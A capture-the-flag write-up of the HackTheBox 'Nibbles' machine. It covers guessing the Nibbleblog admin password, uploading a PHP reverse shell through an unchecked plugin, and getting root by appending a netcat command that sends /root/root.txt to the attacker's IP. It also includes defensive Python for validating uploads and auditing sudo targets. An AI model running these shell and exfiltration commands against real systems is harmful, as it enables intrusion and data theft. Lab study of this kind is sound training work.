
[HackTheBox] Nibbles

I started off with a quick Nmap scan on the target machine.

nmap -sS -sV -Pn 10.10.10.75

Starting Nmap 7.70 ( https://nmap.org ) at 2018-03-24 00:46 AEST
Nmap scan report for 10.10.10.75
Host is up (0.23s latency).
Not shown: 998 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two fairly standard ports were open, and since one of them was HTTP, I decided to see if the web server had anything meaningful on it.

Nothing interesting on the page itself, but looking at the HTML source reveals a directory name worth a visit.

Browsing to that directory (/nibbleblog/) brings up a Nibbleblog blog, but there is nothing on it that we can leverage directly.

This meant more enumeration. A little googling turned up the Nibbleblog GitHub repository:

https://github.com/dignajar/nibbleblog

Looking at the repository, a few files stand out that should also be present on the target:

admin.php
install.php
update.php

There wasn't anything too interesting inside install.php and update.php other than the version number of the hosted application:

Nibbleblog 4.0.3 "Coffee" ©2009 - 2014 | Developed by Diego Najar

However, admin.php looked like a potential path we can dive into.

A quick Google search for a login bypass against this version came back empty, so it looked like I would (most likely) have to brute-force the login.

After some trial and error, the credentials turned out to be:

Username: admin
Password: nibbles

Inside the admin panel I couldn't see anything directly useful, so I enumerated further. I found this link, which explains how to turn this version into code execution. In short, the My Image plugin does not check the extension of uploaded files, so an authenticated admin can upload a PHP file and have the web server execute it.
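To make the bug class concrete, here is an added example (not the plugin's own code, and written in Python rather than the plugin's PHP so the check itself is visible): the flawed pattern the writeup describes next to a hardened validator. The allowlist, the magic-byte table and the function names are this example's assumptions.

```python
import os
import secrets

# Constructed allowlist for an image upload handler (assumption, not the plugin's list).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes each allowed type must start with, so the decision does not rest on the name alone.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def vulnerable_stored_name(client_filename):
    """The flawed pattern: whatever name the client sends decides what lands in the
    web root, so 'image.php' is saved as image.php and Apache executes it on request."""
    return os.path.basename(client_filename)


def validate_image_upload(client_filename, data):
    """Hardened check. Returns the extension to store under, or raises ValueError."""
    name = os.path.basename(client_filename)
    if any(ord(c) < 32 for c in name):        # NUL or other control bytes: reject outright
        raise ValueError("control character in filename")
    if "." not in name:
        raise ValueError("no extension")
    ext = name.rsplit(".", 1)[1].lower()      # use the LAST extension: 'x.jpg.php' -> 'php'
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension not allowed: {ext}")
    if not data.startswith(MAGIC[ext]):       # content must match the declared type
        raise ValueError("content does not look like the declared image type")
    return ext


def safe_stored_name(client_filename, data):
    """Never reuse the client's name: a random name plus the validated extension."""
    ext = validate_image_upload(client_filename, data)
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    php = b"<?php system($_GET['c']); ?>"      # constructed payload, like reverse-shell.php
    print("vulnerable:", vulnerable_stored_name("reverse-shell.php"))
    for name, blob in [("reverse-shell.php", php), ("image.jpg", php), ("image.jpg.php", b"\xff\xd8\xff")]:
        try:
            print("hardened:", name, "->", safe_stored_name(name, blob))
        except ValueError as e:
            print("hardened:", name, "-> rejected:", e)
```

The magic-byte check alone is not a complete defence: a polyglot that starts with GIF89a and continues with PHP passes it. What actually stops the writeup's attack is that the stored name never ends in a server-side extension, backed by serving the upload directory with script execution disabled.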

I took a generic reverse-shell.php (from here) and modified it with my IP and port.

With the payload ready, I started a netcat listener on my VM:

nc -nvlp 8989

With everything locked and loaded, I uploaded my payload via the plugin.

The upload produces some PHP warnings, but they can be ignored. The plugin stores the uploaded file under its own directory as image.php (it keeps our extension but not our filename):

http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

and requesting that URL triggers the reverse shell back to my VM:

listening on [any] 8989 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.75] 54270

Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 10:59:13 up 11:55,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off

$ whoami
nibbler

With a shell ready to go, all I had to do was navigate to the nibbler user folder and retrieve the user.txt flag.

$ cd /home/nibbler && dir
personal.zip	user.txt

$ cat user.txt
b0----------------------------d8

With the user flag out of the way, I decided to enumerate the machine a little bit more.
On a Linux machine, I always start off with the following command:

sudo -l

This command showed us a few interesting things:

$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Our user can run monitor.sh as root without a password. If we can modify that script (or anything along its path), whatever we put in it runs as root.

If you recall from the earlier "dir" command, we had a file called personal.zip. Luckily, the archive was not password-protected and I could unzip it:

$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh  

I navigated to the directory with the bash script file and observed the privileges on it.

$ pwd
/home/nibbler/personal/stuff

$ ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh

The script is owned by nibbler and is world-writable (-rwxrwxrwx), so we can edit it freely.
From here, all I had to do was append a command to the script and it would run as root.
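The check that finds this class of misconfiguration can be automated. The following is an added example (not something from the writeup or from the box): it parses the command lines that `sudo -l` prints, then walks each root-run target and every parent directory looking for ways the invoking user could change what ends up executing. The `demo()` helper rebuilds the Nibbles layout in a temporary directory with a 0777 monitor.sh; the regex, the function names and the reporting format are this example's assumptions.

```python
import os
import re
import stat
import tempfile

# Matches the command lines `sudo -l` prints, e.g.
#   (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
SUDO_CMD_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>/\S*)")


def parse_sudo_targets(sudo_l_output):
    """Return a list of (runas, nopasswd, path) for each command line in `sudo -l` output."""
    targets = []
    for line in sudo_l_output.splitlines():
        m = SUDO_CMD_RE.match(line)
        if m:
            targets.append((m.group("runas"), "NOPASSWD" in m.group("tags"), m.group("cmd")))
    return targets


def _chain_to_root(path):
    """The file plus every ancestor directory, nearest first."""
    nodes, p = [], os.path.abspath(path)
    while True:
        nodes.append(p)
        parent = os.path.dirname(p)
        if parent == p:
            return nodes
        p = parent


def writable_findings(path, uid, gids):
    """Reasons a user (uid, member of gids) could change what a sudo rule ends up running."""
    findings = []
    for node in _chain_to_root(path):
        try:
            st = os.lstat(node)
        except FileNotFoundError:
            findings.append(f"{node}: does not exist (whoever can write its parent can create it)")
            continue
        is_dir = stat.S_ISDIR(st.st_mode)
        sticky = bool(st.st_mode & stat.S_ISVTX)
        # A writable parent directory lets the user rename the script away and drop a
        # replacement; a sticky directory (like /tmp) blocks that for files they don't own.
        if st.st_mode & stat.S_IWOTH and not (is_dir and sticky):
            findings.append(f"{node}: world-writable")
        elif st.st_mode & stat.S_IWGRP and st.st_gid in gids and not (is_dir and sticky):
            findings.append(f"{node}: writable by group {st.st_gid}")
        if uid != 0 and st.st_uid == uid:
            findings.append(f"{node}: owned by the invoking user (uid {uid})")
    return findings


def audit_sudo_l(sudo_l_output, uid=None, gids=None):
    """Map each root-run sudo target to the findings that make it a privilege escalation path."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)
    report = {}
    for runas, nopasswd, path in parse_sudo_targets(sudo_l_output):
        if runas.split(":")[0].strip() not in ("root", "ALL"):
            continue
        findings = writable_findings(path, uid, gids)
        if findings:
            report[path] = findings
    return report


def demo(mode=0o777):
    """Rebuild the Nibbles layout in a temp dir: monitor.sh with the given mode, run as root via NOPASSWD."""
    base = tempfile.mkdtemp()
    stuff = os.path.join(base, "personal", "stuff")
    os.makedirs(stuff)
    script = os.path.join(stuff, "monitor.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\necho monitoring\n")   # constructed stand-in for the real script
    os.chmod(script, mode)                          # 0o777 reproduces the -rwxrwxrwx seen on the box
    sudo_l = f"User nibbler may run the following commands on Nibbles:\n    (root) NOPASSWD: {script}\n"
    return audit_sudo_l(sudo_l)


if __name__ == "__main__":
    for target, reasons in demo().items():
        print(target)
        for r in reasons:
            print("  -", r)
```

Run it on a real box by piping `sudo -l` output into `audit_sudo_l`. The fix the findings point at is the usual one: a sudo target should be root-owned, not group- or world-writable, and sit in a chain of directories with the same properties.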

I had a quick look through /bin for anything I could leverage to get the root flag; the relevant part of the listing:

chvt		    nc		      tailf
cp		    nc.openbsd	      tar

I saw that netcat was installed on the box, so I checked whether it was a build that supports the -e option:

nc -e

nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.

That wasn't a problem: -e is only needed to spawn a shell, and the OpenBSD netcat can still push a file over the network with a plain redirect, which is all I needed to get the flag onto my VM.

On my VM I started a listener that writes whatever it receives to a file:

nc -l -p 9000 > root.txt

Then I appended the sending command to the bottom of the monitor script:

echo "nc -w 3 10.10.14.10 9000 < /root/root.txt" >> monitor.sh

All that was left was to run the monitor script via sudo:

$ sudo /home/nibbler/personal/stuff/monitor.sh

On my local machine the netcat listener exited, meaning the transfer had completed.

All I had to do was read the file on my VM, and the machine was conquered:

root@kali:~/Desktop/HackTheBox/Nibbles# cat root.txt
b6----------------------------8c

Overall, the machine was fairly simple but fun. It definitely touched on a lot of the basics, which is always good to keep in check!
